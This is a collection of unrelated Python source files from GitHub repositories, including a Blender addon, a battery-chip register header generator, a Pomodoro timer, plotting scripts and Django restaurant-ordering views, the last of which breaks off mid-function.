SAVE_LOAD_SHAPES_UL_LoadListItem(bpy.types.UIList):\n def draw_item(\n self, context, layout, data, item, icon, active_data, active_propname, index\n ):\n obj = bpy.context.active_object\n if obj is None:\n return\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n layout.label(text=item.name)\n layout.operator(\n SAVE_LOAD_SHAPES_OT_LoadShape.bl_idname,\n text=\"Load\",\n ).index = index\n\n\nclass SAVE_LOAD_SHAPES_PT_Panel(bpy.types.Panel):\n bl_label = \"Save Load Shapes\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"Save Load Shapes\"\n bl_context = \"mesh_edit\"\n\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon=\"MESH_DATA\")\n\n def draw(self, context):\n layout = self.layout\n\n obj = bpy.context.active_object\n if obj is None:\n return\n\n box = layout.box()\n row = box.row()\n row.label(text=\"Save\")\n row.prop(obj.save_load_shapes, \"save_name\", text=\"\")\n row.operator(SAVE_LOAD_SHAPES_OT_SaveShape.bl_idname)\n\n box = layout.box()\n box.label(text=\"Load\")\n box.template_list(\n \"SAVE_LOAD_SHAPES_UL_LoadListItem\",\n \"load_list\",\n obj.save_load_shapes,\n \"saved_shapes\",\n obj.save_load_shapes,\n \"saved_shapes_index\",\n )\n\n box = layout.box()\n row = box.row()\n row.label(text=\"Delete\")\n row.prop(obj.save_load_shapes, \"delete_name\", text=\"\")\n row.operator(SAVE_LOAD_SHAPES_OT_DeleteShape.bl_idname)\n\n\nclass SAVE_LOAD_SHAPES_PG_SavedShapeItem(bpy.types.PropertyGroup):\n name: bpy.props.StringProperty(default=\"default\")\n obj: bpy.props.PointerProperty(type=bpy.types.Object)\n\n\nclass SAVE_LOAD_SHAPES_PG_Properties(bpy.types.PropertyGroup):\n save_name: bpy.props.StringProperty(default=\"default\")\n delete_name: bpy.props.StringProperty(default=\"\")\n saved_shapes: bpy.props.CollectionProperty(type=SAVE_LOAD_SHAPES_PG_SavedShapeItem)\n saved_shapes_index: bpy.props.IntProperty()\n\n\ndef register():\n bpy.types.Object.save_load_shapes = bpy.props.PointerProperty(\n type=SAVE_LOAD_SHAPES_PG_Properties\n )\n\n\ndef unregister():\n del bpy.types.Object.save_load_shapes\n","repo_name":"MatchaChoco010/BlenderUserScripts","sub_path":"addons/save-load-shapes/save_load_shape.py","file_name":"save_load_shape.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25769248718","text":"from docx import Document\n\n\ndef get_text(filename):\n try:\n if str(filename).endswith('docx'):\n s = ''\n doc = Document(filename)\n for i in doc.paragraphs:\n s += i.text + '\\n'\n return s\n with open(filename, 'r', encoding='utf-8') as file:\n return file.read()\n except FileNotFoundError:\n return None\n except UnicodeDecodeError:\n return None\n except:\n return None\n","repo_name":"Sus-arch/mission_kulture","sub_path":"utils/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2559256219","text":"##str1=\"人生苦短,我用Python!\"\n##substr1=str1[1]\n##substr2=str1[5:]\n##substr3=str1[:5]\n##substr4=str1[2:5]\n##print('原字符串:',str1)\n##print(substr1+'\\n'+substr2+'\\n'+substr3+'\\n'+substr4+'\\n')\n\nstr1=\"人生苦短,我用Python!\"\ntry:\n substr5=str1[15]\nexcept IndexError:\n print(\"指定的索引不存在!\")\n","repo_name":"Hurrieam/homework-csapp","sub_path":"Python作业/05 
字符串/字符串切片.py","file_name":"字符串切片.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"36635032875","text":"'''\r\nJapanese data cleaning\r\n오상혁 나윤수 (Oh Sanghyuk, Na Yoonsu)\r\n2020.3.30 (Mon) data-cleaning code\r\nCleans the input data and tidies up punctuation\r\n'''\r\n\r\nimport re\r\ndef prepro(text):\r\n    # remove sentence punctuation and whitespace characters that render badly\r\n    sub_punc = re.sub('。|!|\\?', '', text)\r\n    sub_u3000=re.sub('　','',sub_punc)\r\n    # replace the special symbol 〆 with しめ (shime)\r\n    sub_sime = re.sub('〆', 'しめ', sub_u3000)\r\n\r\n    return sub_sime\r\n","repo_name":"nys726/japanese_project","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"70540557866","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 20 09:45:50 2021\n\n@author: thiba\n\"\"\"\n\nimport os\nimport json\n\nlist_dico = {}\n\nfor file in os.listdir('.'):\n    if 'mmp' in file:\n        print(file)\n        with open(file, 'r') as f:\n            data = json.load(f)\n        \n        list_dico.update(data)\n\nwith open('mmp_discrete_sanitized.json', 'w+') as fp:\n    json.dump(list_dico, fp, indent=2)\n","repo_name":"thibautloiseau/3D_Vision_WiFi","sub_path":"stats/MMP assainissement/traitement_json.py","file_name":"traitement_json.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"72851205226","text":"from xml.dom import minidom\nfrom xml.dom.minidom import Node\nimport re\n\nfrom xlrd import open_workbook\nfrom lxml import etree\nimport os\n\n\ndef replaceCodeRegion(file_path,region_name,new_region_content):\n\t#pragma region\n\tregex = \"// region \" + region_name + \".*\" + \"// endregion \" + region_name\n\t\n\tfile_content = open(file_path, 'r').read();\n\told_region_content = str(re.search(regex, file_content,re.DOTALL)[0])\n\n\t\n\tfile_content_list = file_content.split(old_region_content,1)\n\tfile_content = file_content_list[0]\n\tfile_content += \"// region \" + region_name + \"\\n\\n\"\n\tfile_content += new_region_content\n\tfile_content += \"\\n\\n// endregion \" + region_name\n\tfile_content += file_content_list[1]\n\tf = open(file_path,\"w\")\n\tf.write(file_content)\t\n\n\n\n\n\ndef formatHex(hex_str):\n\t\n\ttmp = removeWhiteSigns(hex_str.upper())\n\ttmp = tmp.replace(\"X\",\"x\")\n\tn = len(tmp)\n\t\n\tres = \"\"\n\tfor i in range(0,2):\n\t\tres += tmp[i]\n\tfor i in range(0,10-n):\n\t\tres += \"0\"\n\tfor i in range(2,n):\n\t\tres += tmp[i]\n\t\t\n\treturn res\n\t\ndef removeWhiteSigns(str):\n\tres = \"\"\n\t\n\tfor c in str:\n\t\tif ord(c) > 32 and ord(c) < 127:\n\t\t\tres += c\n\treturn res\ndef getCellValuesList(sheet,row,col):\n\treturn str(sheet.cell(row,col).value).split()\t\ndef getCellValue(sheet,row,col):\n\treturn removeWhiteSigns(str(sheet.cell(row,col).value))\ndef getCellValue2(sheet,row,col):\n\tres = str(sheet.cell(row,col).value)\n\tres = res.replace(\"—\", \"-\")\n\treturn res\n\n\ndef xls2xml():\n\n\tfilesDir = '';\n\troot = etree.Element(\"flash\")\n\t\n\n\twb = open_workbook('bq78350.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, 
\"REG\")\n\t\t\taf.set('class',getCellValue(sheet,row,0))\n\t\t\taf.set('subclass',getCellValue(sheet,row,1))\n\t\t\taf.set('address',getCellValue(sheet,row,2));\n\t\t\taf.set('name',getCellValue(sheet,row,3));\n\t\t\taf.set('type',getCellValue(sheet,row,4));\n\n\n\twb = open_workbook('SBS.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, \"SBS\")\n\t\t\taf.set('value',getCellValue(sheet,row,0))\n\t\t\taf.set('access',getCellValue(sheet,row,1))\n\t\t\taf.set('name',getCellValue(sheet,row,2));\n\t\t\taf.set('dataDescription',getCellValue2(sheet,row,3));\n\t\t\taf.set('dataSize',getCellValue2(sheet,row,4));\n\t\t\taf.set('min',getCellValue2(sheet,row,5));\n\t\t\taf.set('max',getCellValue2(sheet,row,6));\n\t\t\taf.set('default',getCellValue2(sheet,row,7));\n\t\t\taf.set('units',getCellValue2(sheet,row,8));\n\t\n\twb = open_workbook('MA.xlsx')\n\n\tfor sheet in wb.sheets():\n\t\tnumber_of_rows = sheet.nrows\n\t\tnumber_of_columns = sheet.ncols\n\t\t\n\t\tfor row in range(2, number_of_rows):\n\t\n\t\t\taf = etree.SubElement(root, \"MA\")\n\t\t\taf.set('value',getCellValue(sheet,row,0))\n\t\t\taf.set('name',getCellValue(sheet,row,1))\n\t\t\taf.set('access',getCellValue(sheet,row,2))\n\t\t\t\t\n\ttree = etree.ElementTree(root)\n\ttree.write('bq78350.xml',pretty_print=True)\n\t\t\t\t\ndef getPlatformCondition(device_tag):\n\treturn str(\"#if (kLib_config_PLATFORM == kLib_\"+getName(device_tag)+\")\\n\\n\")\ndef getEndIfStr():\n\treturn str(\"#endif\\n\")\ndef grabTags(parent,tag_name):\n\treturn parent.getElementsByTagName(tag_name)\ndef getAttribute(tag,attribute_name):\n\treturn str(tag.attributes[attribute_name].value)\ndef getValue(tag):\n\treturn getAttribute(tag,'value')\n\ndef getName(tag):\n\treturn getAttribute(tag,'name')\ndef getStructEnumOpener():\n\tres = str(\t\"\\ttypedef struct\\n\"+\n\t\t\t\t\"\\t{\\n\"+\n\t\t\t\t\"\\t\\ttypedef enum\\n\"+\n\t\t\t\t\"\\t\\t{\")\n\treturn res\ndef getStructEnumCloser(enum_name,struct_name):\n\tres = \"\\n\\t\\t}\"+enum_name+\";\\n\"\n\tres += \"\\t}\"+struct_name+\";\\n\\n\"\n\treturn res\ndef getStructOpener():\n\tres = str(\t\"\\ttypedef struct\\n\"+\n\t\t\t\t\"\\t{\")\n\treturn res\ndef getStructCloser(struct_name):\n\tres = \"\\n\\t}\"+struct_name+\";\\n\\n\"\n\treturn res\n\n\ndef getClassName(tag):\n\treturn getAttribute(tag,'class')\ndef getSublcassName(tag):\n\treturn getAttribute(tag,'subclass')\n\t\ndef getClassListNames(tags):\n\tres = []\n\t\n\tfor tag in tags:\n\t\tclass_name = getClassName(tag)\n\t\tif class_name not in res:\n\t\t\tres.append(class_name)\n\treturn res\n\t\ndef getSubclassListNames(tags):\n\tres = []\n\t\n\tfor tag in tags:\n\t\tsubclass_name = getSublcassName(tag)\n\t\tif subclass_name not in res:\n\t\t\tres.append(subclass_name)\n\treturn res\n\ndef grabAllClassTags(parent,class_name):\n\tres = []\n\tfor tag in parent:\n\t\tif class_name == getClassName(tag):\n\t\t\tres.append(tag)\n\treturn res\ndef grabAllSubclassTags(parent,subclass_name):\n\tres = []\n\tfor tag in parent:\n\t\tif subclass_name == getSublcassName(tag):\n\t\t\tres.append(tag)\n\treturn res\n\ndef assertString(str):\n\tstr = str.replace(\".\",\"\")\n\tstr = str.replace(\"%\",\"Percent\")\n\tstr = str.replace(\"/\",\"_\")\n\tstr = str.replace(\"-\",\"\")\n\t\n\treturn str\n\t\ndef removeDecimalPoints(str):\n\tstr = str.replace(\".0\", \"\")\n\treturn str\n\ndef createDataFlashRegisterStructs():\n\n\tres = 
\"\"\n\tdefs = minidom.parse('bq78350.xml')\n\tregisters = defs.getElementsByTagName('REG')\n\n\tclasses = getClassListNames(registers)\n\t\n\t\n\tfor class_name in classes:\n\t\t\n\t\tclass_tags = grabAllClassTags(registers,class_name)\n\t\tsubclasses_names = getSubclassListNames(class_tags)\n\t\t\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\tfor subclass_name in subclasses_names:\n\t\t\tsubclass_tags = grabAllSubclassTags(class_tags,subclass_name)\n\t\t\n\t\t\tsubclass_name = assertString(subclass_name)\n\t\t\n\t\t\tenum_exist = False\n\t\t\tfor tag in subclass_tags:\n\t\t\t\tif not enum_exist:\n\t\t\t\t\tres += getStructEnumOpener()\n\t\t\t\tif enum_exist:\n\t\t\t\t\tres += \",\"\n\t\t\t\tenum_exist = True\n\n\t\t\t\t\n\n\t\t\t\ttemp_name = getAttribute(tag,'name')\n\t\t\t\ttemp_name = assertString(temp_name)\n\n\t\t\t\tres += \"\\n\\t\\t\\t_\" + temp_name + \" = \" + getAttribute(tag,'address')\n\t\t\t\n\t\t\tif enum_exist:\n\t\t\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_\"+ subclass_name + \"_SELECT_\"\n\t\t\t\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\n\n\tfor class_name in classes:\n\t\t\n\t\tclass_tags = grabAllClassTags(registers,class_name)\n\t\tsubclasses_names = getSubclassListNames(class_tags)\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\tres += getStructOpener()\n\t\tfor subclass_name in subclasses_names:\n\n\t\t\tsubclass_name = assertString(subclass_name)\n\n\t\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_\"+ subclass_name + \"_SELECT_STRUCT\"\n\t\t\tres += \"\\n\\t\\t\" + temp_str + \" _\" + subclass_name + \";\"\n\t\t\t\n\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_SELECT_SELECT_STRUCT\"\n\t\tres += getStructCloser(temp_str)\n\t\t\n\tres += getStructOpener()\n\tfor class_name in classes:\n\t\t\n\t\tclass_name = assertString(class_name)\n\t\t\n\t\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_\"+class_name+\"_SELECT_SELECT_STRUCT\"\n\t\tres += \"\\n\\t\\t\" + temp_str + \" _\" + class_name + \";\"\n\t\t\n\ttemp_str = \"kBQ78350_DATA_FLASH_REGISTER_SELECT_SELECT_SELECT_STRUCT\"\n\tres += getStructCloser(temp_str)\n\t\t\n\t\n\tsbs = defs.getElementsByTagName('SBS')\n\tres += getStructEnumOpener()\n\tisLastTag = True\n\tn = len(sbs)\n\ti=0\n\t\n\tmax_str = \"RemainingCapacityAlarm = 0x01,\"\n\t\n\tfor tag in sbs:\n\t\ti+= 1\n\n\t\ttemp = \"\\n\\t\\t\\t\" + getAttribute(tag,'name') + \" = \" + getAttribute(tag,'value')\n\t\tif i != n:\n\t\t\ttemp += \",\"\n\t\tm = len(max_str) - len(temp) + 2\n\t\tfor j in range(0,m):\n\t\t\ttemp += \" \"\n\t\ttemp += \"\\t// ACCESS: \" + getAttribute(tag,'access')\n\t\ttemp += \",\\tDATA TYPE: \" + getAttribute(tag,'dataDescription')\n\t\ttemp += \",\\tDATA SIZE: \" + removeDecimalPoints(getAttribute(tag,'dataSize'))\n\t\ttemp += \",\\tMIN: \" + removeDecimalPoints(getAttribute(tag,'min'))\n\t\ttemp += \",\\tMAX: \" + removeDecimalPoints(getAttribute(tag,'max'))\n\t\ttemp += \",\\tDEFAULT: \" + removeDecimalPoints(getAttribute(tag,'default'))\n\t\ttemp += \",\\tUNIT: \" + getAttribute(tag,'units')\n\t\t\n\t\t\n\t\tres += temp\n\t\t\n\ttemp_str = \"kBQ78350_SBS_COMMANDS_\"\n\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\t\t\n\t\n\n\tma = defs.getElementsByTagName('MA')\n\tres += getStructEnumOpener()\n\tisLastTag = True\n\tn = len(ma)\n\ti=0\n\t\n\tmax_str = \"OutputCellVoltageCCandTempforCalibration = 0xF082 \"\n\t\n\tfor tag in ma:\n\t\ti+= 1\n\n\t\ttemp = \"\\n\\t\\t\\t\" + getAttribute(tag,'name') + \" = \" + 
getAttribute(tag,'value')\n\t\tif i != n:\n\t\t\ttemp += \",\"\n\t\tm = len(max_str) - len(temp) + 2\n\t\tfor j in range(0,m):\n\t\t\ttemp += \" \"\n\t\ttemp += \"\\t// ACCESS: \" + getAttribute(tag,'access')\n\t\t\n\t\tres += temp\n\t\t\n\ttemp_str = \"kBQ78350_MANUFACTURER_ACCESS_COMMANDS_\"\n\tres += getStructEnumCloser(temp_str + \"ENUM\",temp_str + \"STRUCT\")\t\t\n\n\treturn res\n\n\n\t\nxls2xml()\nreplaceCodeRegion(\"../../../inc/kIC/kBQ78350.h\",'PLATFORM_DEPENDED_STRUCTS',createDataFlashRegisterStructs())\n","repo_name":"knkresources/kLib","sub_path":"auto/other/bq78350/autoDefs.py","file_name":"autoDefs.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27814635949","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\nbins=50\n\n\ndf1 = pd.read_csv('output/bw_r10fm_N5000.dat', header=None, names=['exc0','exc'])\ndf2 = pd.read_csv('output/bw_r10fm_N5000_ad.dat', header=None, names=['exc0','exc'])\n\nx = df1['exc0']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label='No Coulomb repulsion')\n\nx = df1['exc']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label=r'Isotropic; $d_1=10$ fm')\n\nx = df2['exc']\nf = stats.gaussian_kde(x)\nn, x, _ = plt.hist(x, bins=bins, range=(1.5,6.0), histtype='step', density=True, color='white')\nplt.plot(x, f(x), label=r'$1-\\sin^2\\theta$; $d_1=10$ fm')\n\n\nplt.xlabel(r'$E_{x}$(Be) (MeV)')\n\nplt.title(r'Effect of Coulomb repulsion on reconstruction of $^8$Be excitation energy')\n\nplt.legend(prop={'size': 8})\n\nplt.savefig('bw.png')\n\nplt.show()\n\n","repo_name":"oliskir/coulomb3a","sub_path":"plot_bw.py","file_name":"plot_bw.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32198033991","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- # \ndef reset_timer():\n global reps\n window.after_cancel(timer)\n cavas.itemconfig(timer_text, text=f\"00:00\")\n timer_lable.config(text=\"Timer\", fg=GREEN)\n tik_lable.config(text=\"\")\n reps = 0\n# ---------------------------- TIMER MECHANISM ------------------------------- # \ndef start_timer():\n global reps\n work_sec = WORK_MIN\n short_break_sec = SHORT_BREAK_MIN\n long_break_sec = LONG_BREAK_MIN\n\n reps += 1\n if reps in [1,3,5,7]:\n timer_lable.config(text=\"Work\", fg=GREEN)\n\n count_down(work_sec)\n print(\"work 25 sec \")\n\n\n\n elif reps == 8:\n timer_lable.config(text=\"Break\", fg=RED)\n count_down(long_break_sec)\n print(\"long break 20 sec\")\n\n\n elif reps in [2,4,6]:\n timer_lable.config(text=\"Break\", fg=PINK)\n count_down(short_break_sec)\n print(\"short break 5 \")\n\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \ndef count_down(count):\n global reps\n count_min = math.floor(count/60)\n count_sec = count % 60\n if count_sec < 10:\n count_sec = 
f\"0{count_sec}\"\n\n cavas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n global timer\n timer=window.after(1000, count_down, count-1)\n else:\n start_timer()\n tik=\"✔\"\n if reps%2==0:\n tik_lable.config(text=f\"{tik*math.floor(reps/2)}\")\n\n # ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomidoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\n\n\n\ncavas = Canvas(width=200,height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncavas.create_image(100, 112, image=tomato_img)\ntimer_text = cavas.create_text(100, 132, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncavas.grid(row=1,column=1)\n# cavas.pack( )\n\n\ntimer_lable = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME,40))\ntimer_lable.grid(row=0,column=1)\n\nstat_button = Button(text=\"Start\",background=YELLOW, highlightthickness=0, command=start_timer)\nstat_button.grid(row=2,column=0)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(row=2, column=2)\n\ntik_lable = Label(bg=YELLOW, fg=GREEN,font=(FONT_NAME,35,\"bold\"))\ntik_lable.grid(row=3,column=1)\n\nwindow.mainloop()","repo_name":"foxmeller/pomidoro_timer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11379524115","text":"from collections import defaultdict\nimport re\nimport datetime\n\nmins = defaultdict(int)\nmin_sleep_guard = defaultdict(lambda: defaultdict(int))\nduty = None\nsleep = None\n\nre_l = re.compile(r'\\[([^\\]]+)\\] (.+)')\n\nlines = list(open('input04'))\nlines.sort()\nfor l in lines:\n dat, event = re_l.match(l.strip()).groups()\n dt = datetime.datetime.strptime(dat, '%Y-%m-%d %H:%M')\n if event.startswith('Guard'):\n duty = event.split()[1]\n if 'asleep' in event:\n sleep = dt\n if 'wakes' in event:\n mins[duty] += (dt - sleep).seconds / 60\n m2 = dt.minute\n m = sleep.minute\n while m != m2:\n min_sleep_guard[duty][m] += 1\n m += 1\n m %= 60\n\nk = max(mins.items(), key=lambda kv:kv[1])[0]\nkk = max(min_sleep_guard[k].items(), key=lambda kv:kv[1])[0]\nprint(int(k[1:]) * kk)\n \n\n\n\n","repo_name":"kyegupov/aoc2018","sub_path":"day04_1.py","file_name":"day04_1.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25501954021","text":"#!/usr/bin/env python\n\"\"\"Setup script for the dotblas module distribution.\"\"\"\n__revision__ = \"$Version$\"\n\nfrom distutils.core import setup, Extension\n\n# Set this to point at your BLAS/ATLAS libraries\nblas_dirs_list = ['/usr/lib/']\nblas_libraries_list = ['lapack','cblas','f77blas', 'atlas', 'g2c']\n\nsetup (# Distribution meta-data\n name = \"dotblas\",\n version = \"1.0a\",\n description = \"Provides a BLAS optimised dot product for Numeric arrays\",\n author = \"Richard Everson\",\n author_email = \"R.M.Everson@exeter.ac.uk\",\n url = \"http://www.dcs.ex.ac.uk/people/reverson\",\n license = \"MIT\",\n # Description of the modules and packages in the distribution\n packages = ['dotblas'],\n ext_modules = \n [Extension('_dotblas', ['dotblas/_dotblas.c'],\n library_dirs=blas_dirs_list ,\n libraries=blas_libraries_list,\n ),\n ]\n 
)\n","repo_name":"mikeswamp/numeric_copy","sub_path":"Packages/dotblas/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10971685152","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom restaurant.models import Category, Food\nfrom order.models import Order, Order_State, Cart, Cart_State\nfrom django.views.generic import TemplateView\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User, auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nimport itertools\nimport json\n\n# Create your views here.\ndef index(request):\n\n return render(\n request,\n 'restaurant/index.html',\n )\n\ndef login(request):\n if request.method == 'GET':\n username = request.GET.get('username')\n password = request.GET.get('password')\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n except Order.DoesNotExist:\n order = Order.objects.create(table_id=auth.get_user(request))\n print('=========================================')\n print(\"Table \", username, \" logged in successfully!\")\n print('=========================================')\n return redirect('index')\n else:\n return HttpResponse('

Please scan QR code in order to use our website

')\n else:\n return HttpResponse('Please scan QR code in order to use our website')\n\n@login_required(redirect_field_name='login')\ndef logout(request):\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n return redirect('home')\n except Order.DoesNotExist:\n auth.logout(request)\n return HttpResponseRedirect('thankyou')\n\n@login_required(redirect_field_name='login')\ndef block_home(request):\n hasOrder = False\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n hasOrder = True\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total}\n return render(\n request,\n 'restaurant/block_home.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef home(request):\n return render(\n request,\n 'restaurant/home.html',\n {\n\t\t\t'header':'Welcome',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef billed(request):\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n bill.billed = True\n bill.save()\n except Order.DoesNotExist:\n pass\n try:\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n cart.delete()\n except Cart.DoesNotExist:\n pass\n auth.logout(request)\n return HttpResponseRedirect('login')\n\n@login_required(redirect_field_name='login')\ndef block_menu(request):\n category = Category.objects.exclude(category_name = 'Drinks')\n category = category.exclude(category_name = 'Snacks')\n drinks = Category.objects.filter(category_name = 'Drinks')\n snacks = Category.objects.filter(category_name = 'Snacks')\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n total = 0\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n total += food.price\n args = {'Category': category, 'Drinks': drinks, 'Snacks': snacks, 'Total': total}\n return render(\n request,\n 'restaurant/block_menu.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef menu(request):\n return render(\n request,\n 'restaurant/menu.html',\n {\n 'title':'Menu',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef block_orders(request):\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n foodlist = []\n total = 0\n state = Order_State.objects.filter(order = bill)\n for state in state:\n foodlist.append(state)\n if state.state != 'cancelled':\n total += state.food.price\n context = {'foodlist' : foodlist, 'total': total}\n return render(\n request,\n 'restaurant/block_orders.html',\n context,\n )\n\n@login_required(redirect_field_name='login')\ndef orders(request):\n return render(\n request,\n 'restaurant/orders.html',\n {\n 'title':'Orders',\n }\n )\n\n@login_required(redirect_field_name='login')\ndef block_services(request):\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = True\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total}\n return render(\n\t\trequest,\n\t\t'restaurant/block_services.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef services(request):\n return render(\n\t\trequest,\n\t\t'restaurant/services.html',\n 
)\n\n@login_required(redirect_field_name='login')\ndef block_cart(request):\n category_id = request.POST.get('category_id')\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n foodlist = []\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n foodlist.append(food)\n context = {'cart': foodlist, 'category_id': category_id}\n template = 'restaurant/block_cart.html'\n return render(request, template, context)\n\n@login_required(redirect_field_name='login')\ndef cart(request):\n return render(\n request,\n 'restaurant/cart.html',\n )\n\n@login_required(redirect_field_name='login')\ndef block_items(request):\n category_id = request.POST.get('category_id')\n foods = Food.objects.filter(category_id = category_id, available = True)\n title = Category.objects.filter(category_id = category_id)\n cart = Cart.objects.filter(table_id = auth.get_user(request))\n total = 0\n for cart in cart:\n cart_food = cart.carted_food.all()\n for food in cart_food:\n total += food.price\n args = {'Food': foods, 'Title': title, 'category_id': category_id, 'Total': total}\n return render(\n\t\trequest,\n\t\t'restaurant/block_items.html',\n\t\targs,\n )\n\n@login_required(redirect_field_name='login')\ndef items(request):\n\treturn render(\n request,\n 'restaurant/items.html',\n )\n\n@login_required(redirect_field_name='login')\ndef add_to_cart(request):\n food_id = request.POST.get('food_id')\n quantity = int(request.POST.get('quantity'))\n food = Food.objects.get(food_id=food_id)\n try:\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart_s = Cart_State.objects.filter(cart = cart)\n if cart_s.count() + quantity > 30:\n return HttpResponse('Failure')\n except Cart.DoesNotExist:\n cart = Cart.objects.create(table_id=auth.get_user(request))\n for x in range(quantity):\n cart_state = Cart_State.objects.create(cart=cart, food=food)\n\n return HttpResponse('success')\n\n@login_required(redirect_field_name='login')\ndef remove_from_cart(request):\n food_id = request.POST.get('food_id')\n if food_id == 'ALL':\n try:\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart.delete()\n except Cart.DoesNotExist:\n pass\n else:\n food = Food.objects.get(food_id=food_id)\n cart = Cart.objects.get(table_id=auth.get_user(request))\n cart_state = Cart_State.objects.filter(cart=cart, food=food).first()\n cart_state.delete()\n\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef proceed_order(request):\n table_id = auth.get_user(request)\n cart = Cart.objects.filter(table_id = table_id)\n proceed_order = 'cart_empty'\n print('==============================================')\n 